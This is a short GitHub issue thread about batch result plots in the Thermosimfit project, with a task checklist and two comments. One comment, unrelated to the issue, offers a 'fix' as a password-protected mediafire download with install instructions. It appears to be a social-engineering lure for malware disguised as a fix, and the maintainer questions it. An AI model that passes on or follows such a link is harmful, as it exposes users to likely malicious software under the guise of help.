### ISSUE TITLE
Batch Plot

### ISSUE THREAD

**Issue by Konrad1991** [ComPlat/Thermosimfit#17]
- [x] calc dynamic size of batch result plots. Based on n_repps and n_datasets
- [x] render plots 
- [x] nice downloads of plots
- [x] implement it for all cases

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Konrad1991** [comment]
are you answering the correct issue ;)
